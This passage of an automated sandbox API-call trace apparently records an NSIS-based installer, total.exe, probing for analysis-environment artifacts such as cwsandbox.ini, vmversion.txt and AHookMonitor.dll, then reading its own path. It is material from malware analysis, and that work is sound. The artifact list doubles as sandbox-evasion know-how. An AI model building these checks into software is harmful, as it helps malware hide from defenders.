returned="c:\\cwsandbox\\cwsandbox.ini" [0157.878] wsprintfA (in: param_1=0x314418, param_2="%d" | out: param_1="-1") returned 2 [0157.878] lstrcpyA (in: lpString1=0x432800, lpString2="-1" | out: lpString1="-1") returned="-1" [0157.878] lstrcpynA (in: lpString1=0x42e3a0, lpString2="-1", iMaxLength=1024 | out: lpString1="-1") returned="-1" [0157.878] lstrlenA (lpString="-1") returned 2 [0157.878] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.878] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.878] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.878] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.878] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0157.878] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.879] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.879] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.879] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.879] GetFileAttributesA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll")) returned 0x2020 [0157.879] CreateFileA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x2020, hTemplateFile=0x0) returned 0xffffffff [0157.879] lstrcpynA (in: lpString1=0x31441c, lpString2="kernel32::GetFileAttributes(t 'c:\\test\\vmversion.txt')i .R0", iMaxLength=1024 | out: lpString1="kernel32::GetFileAttributes(t 'c:\\test\\vmversion.txt')i .R0") returned="kernel32::GetFileAttributes(t 'c:\\test\\vmversion.txt')i .R0" [0157.879] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.879] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.879] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.880] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0157.880] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0157.880] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0157.880] lstrcpyA (in: lpString1=0x321398, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0157.880] lstrcpyA (in: lpString1=0x3217a8, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0157.880] lstrcpyA (in: lpString1=0x321ba8, lpString2="GetFileAttributes" | out: lpString1="GetFileAttributes") returned="GetFileAttributes" [0157.880] lstrcpynA (in: lpString1=0x322c50, lpString2="c:\\test\\vmversion.txt", iMaxLength=1024 | out: lpString1="c:\\test\\vmversion.txt") returned="c:\\test\\vmversion.txt" [0157.880] GetModuleHandleA (lpModuleName="kernel32") returned 0x75c90000 [0157.881] GetProcAddress (hModule=0x75c90000, lpProcName="GetFileAttributes") returned 0x0 [0157.881] lstrlenA (lpString="GetFileAttributes") returned 17 [0157.881] GetProcAddress (hModule=0x75c90000, lpProcName="GetFileAttributesA") returned 0x75ca5414 [0157.881] lstrcpynA (in: lpString1=0x321398, lpString2="c:\\test\\vmversion.txt", iMaxLength=1024 | out: lpString1="c:\\test\\vmversion.txt") returned="c:\\test\\vmversion.txt" [0157.881] lstrcpynA (in: lpString1=0x314418, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.881] GetFileAttributesA (lpFileName="c:\\test\\vmversion.txt" (normalized: "c:\\test\\vmversion.txt")) returned 0xffffffff [0157.881] lstrcpynA (in: lpString1=0x314418, lpString2="c:\\test\\vmversion.txt", iMaxLength=1024 | out: lpString1="c:\\test\\vmversion.txt") returned="c:\\test\\vmversion.txt" [0157.881] wsprintfA (in: param_1=0x314418, param_2="%d" | out: param_1="-1") returned 2 [0157.881] lstrcpyA (in: lpString1=0x432800, lpString2="-1" | out: lpString1="-1") returned="-1" [0157.881] lstrcpynA (in: lpString1=0x42e3a0, lpString2="-1", iMaxLength=1024 | out: lpString1="-1") returned="-1" [0157.881] lstrlenA (lpString="-1") returned 2 [0157.881] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.882] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.882] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.882] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.882] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0157.882] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.882] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.882] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.882] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.882] GetFileAttributesA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll")) returned 0x2020 [0157.882] CreateFileA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x2020, hTemplateFile=0x0) returned 0xffffffff [0157.883] lstrcpynA (in: lpString1=0x31441c, lpString2="kernel32::GetFileAttributes(t 'c:\\bin\\AHookMonitor.dll')i .R0", iMaxLength=1024 | out: lpString1="kernel32::GetFileAttributes(t 'c:\\bin\\AHookMonitor.dll')i .R0") returned="kernel32::GetFileAttributes(t 'c:\\bin\\AHookMonitor.dll')i .R0" [0157.883] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.883] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.883] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.883] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0157.883] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0157.883] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0157.883] lstrcpyA (in: lpString1=0x321398, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0157.883] lstrcpyA (in: lpString1=0x3217a8, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0157.883] lstrcpyA (in: lpString1=0x321ba8, lpString2="GetFileAttributes" | out: lpString1="GetFileAttributes") returned="GetFileAttributes" [0157.883] lstrcpynA (in: lpString1=0x322c50, lpString2="c:\\bin\\AHookMonitor.dll", iMaxLength=1024 | out: lpString1="c:\\bin\\AHookMonitor.dll") returned="c:\\bin\\AHookMonitor.dll" [0157.884] GetModuleHandleA (lpModuleName="kernel32") returned 0x75c90000 [0157.884] GetProcAddress (hModule=0x75c90000, lpProcName="GetFileAttributes") returned 0x0 [0157.884] lstrlenA (lpString="GetFileAttributes") returned 17 [0157.884] GetProcAddress (hModule=0x75c90000, lpProcName="GetFileAttributesA") returned 0x75ca5414 [0157.884] lstrcpynA (in: lpString1=0x321398, lpString2="c:\\bin\\AHookMonitor.dll", iMaxLength=1024 | out: lpString1="c:\\bin\\AHookMonitor.dll") returned="c:\\bin\\AHookMonitor.dll" [0157.884] lstrcpynA (in: lpString1=0x314418, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.884] GetFileAttributesA (lpFileName="c:\\bin\\AHookMonitor.dll" (normalized: "c:\\bin\\ahookmonitor.dll")) returned 0xffffffff [0157.885] lstrcpynA (in: lpString1=0x314418, lpString2="c:\\bin\\AHookMonitor.dll", iMaxLength=1024 | out: lpString1="c:\\bin\\AHookMonitor.dll") returned="c:\\bin\\AHookMonitor.dll" [0157.885] wsprintfA (in: param_1=0x314418, param_2="%d" | out: param_1="-1") returned 2 [0157.885] lstrcpyA (in: lpString1=0x432800, lpString2="-1" | out: lpString1="-1") returned="-1" [0157.885] lstrcpynA (in: lpString1=0x42e3a0, lpString2="-1", iMaxLength=1024 | out: lpString1="-1") returned="-1" [0157.885] lstrlenA (lpString="-1") returned 2 [0157.885] lstrcpynA (in: lpString1=0x40a418, lpString2="FALSE", iMaxLength=1024 | out: lpString1="FALSE") returned="FALSE" [0157.885] lstrlenA (lpString="FALSE") returned 5 [0157.886] lstrcpynA (in: lpString1=0x432800, lpString2="FALSE", iMaxLength=1024 | out: lpString1="FALSE") returned="FALSE" [0157.886] lstrcpynA (in: lpString1=0x432c00, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.886] lstrcpynA (in: lpString1=0x42e3a0, lpString2="FALSE", iMaxLength=1024 | out: lpString1="FALSE") returned="FALSE" [0157.886] lstrlenA (lpString="FALSE") returned 5 [0157.886] lstrcpynA (in: lpString1=0x40ac18, lpString2="FALSE", iMaxLength=1024 | out: lpString1="FALSE") returned="FALSE" [0157.886] lstrcpynA (in: lpString1=0x40b018, lpString2="TRUE", iMaxLength=1024 | out: lpString1="TRUE") returned="TRUE" [0157.886] lstrcmpiA (lpString1="FALSE", lpString2="TRUE") returned -1 [0157.886] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.886] lstrlenA (lpString="") returned 0 [0157.886] lstrcpynA (in: lpString1=0x31400c, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.886] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.886] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.886] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.886] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.886] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0157.886] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.887] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.887] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.887] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.887] GetFileAttributesA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll")) returned 0x2020 [0157.887] CreateFileA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x2020, hTemplateFile=0x0) returned 0xffffffff [0157.887] lstrcpynA (in: lpString1=0x31441c, lpString2="kernel32::GetModuleFileName(i 0, t .R1, i 1024)i.R0", iMaxLength=1024 | out: lpString1="kernel32::GetModuleFileName(i 0, t .R1, i 1024)i.R0") returned="kernel32::GetModuleFileName(i 0, t .R1, i 1024)i.R0" [0157.887] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.887] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.887] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.888] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0157.888] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0157.888] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0157.888] lstrcpyA (in: lpString1=0x321398, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0157.888] lstrcpyA (in: lpString1=0x3217a8, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0157.888] lstrcpyA (in: lpString1=0x321ba8, lpString2="GetModuleFileName" | out: lpString1="GetModuleFileName") returned="GetModuleFileName" [0157.888] GetModuleHandleA (lpModuleName="kernel32") returned 0x75c90000 [0157.889] GetProcAddress (hModule=0x75c90000, lpProcName="GetModuleFileName") returned 0x0 [0157.889] lstrlenA (lpString="GetModuleFileName") returned 17 [0157.889] GetProcAddress (hModule=0x75c90000, lpProcName="GetModuleFileNameA") returned 0x75ca14b1 [0157.889] lstrcpynA (in: lpString1=0x322c50, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.889] lstrcpynA (in: lpString1=0x321398, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.889] lstrcpynA (in: lpString1=0x314418, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.889] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x321398, nSize=0x400 | out: lpFilename="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe")) returned 0x2e [0157.889] wsprintfA (in: param_1=0x314418, param_2="%d" | out: param_1="1024") returned 4 [0157.889] lstrcpynA (in: lpString1=0x314418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe" [0157.889] lstrcpyA (in: lpString1=0x432c00, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe" | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe" [0157.889] wsprintfA (in: param_1=0x314418, param_2="%d" | out: param_1="0") returned 1 [0157.889] wsprintfA (in: param_1=0x314418, param_2="%d" | out: param_1="46") returned 2 [0157.889] lstrcpyA (in: lpString1=0x432800, lpString2="46" | out: lpString1="46") returned="46" [0157.890] lstrcpynA (in: lpString1=0x42e3a0, lpString2="46", iMaxLength=1024 | out: lpString1="46") returned="46" [0157.890] lstrlenA (lpString="46") returned 2 [0157.890] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.890] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.890] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.890] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.890] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0157.890] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.890] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.890] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.890] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.890] GetFileAttributesA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll")) returned 0x2020 [0157.890] CreateFileA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x2020, hTemplateFile=0x0) returned 0xffffffff [0157.891] lstrcpynA (in: lpString1=0x31441c, lpString2="User32::CharLower(t R1 R1)i", iMaxLength=1024 | out: lpString1="User32::CharLower(t R1 R1)i") returned="User32::CharLower(t R1 R1)i" [0157.891] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.891] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.891] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.891] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0157.891] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0157.891] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0157.891] lstrcpyA (in: lpString1=0x321398, lpString2="User32" | out: lpString1="User32") returned="User32" [0157.891] lstrcpyA (in: lpString1=0x3217a8, lpString2="User32" | out: lpString1="User32") returned="User32" [0157.891] lstrcpyA (in: lpString1=0x321ba8, lpString2="CharLower" | out: lpString1="CharLower") returned="CharLower" [0157.891] GetModuleHandleA (lpModuleName="User32") returned 0x76780000 [0157.891] GetProcAddress (hModule=0x76780000, lpProcName="CharLower") returned 0x0 [0157.891] lstrlenA (lpString="CharLower") returned 9 [0157.891] GetProcAddress (hModule=0x76780000, lpProcName="CharLowerA") returned 0x767a3e75 [0157.891] lstrcpynA (in: lpString1=0x321398, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe" [0157.892] lstrcpynA (in: lpString1=0x314418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe" [0157.892] lstrcpynA (in: lpString1=0x321398, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.892] lstrcpynA (in: lpString1=0x321398, lpString2="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe", iMaxLength=1024 | out: lpString1="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe") returned="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe" [0157.892] lstrcpyA (in: lpString1=0x432c00, lpString2="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe" | out: lpString1="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe") returned="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe" [0157.892] wsprintfA (in: param_1=0x321398, param_2="%d" | out: param_1="3228696") returned 7 [0157.892] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.892] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.892] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.892] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.892] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 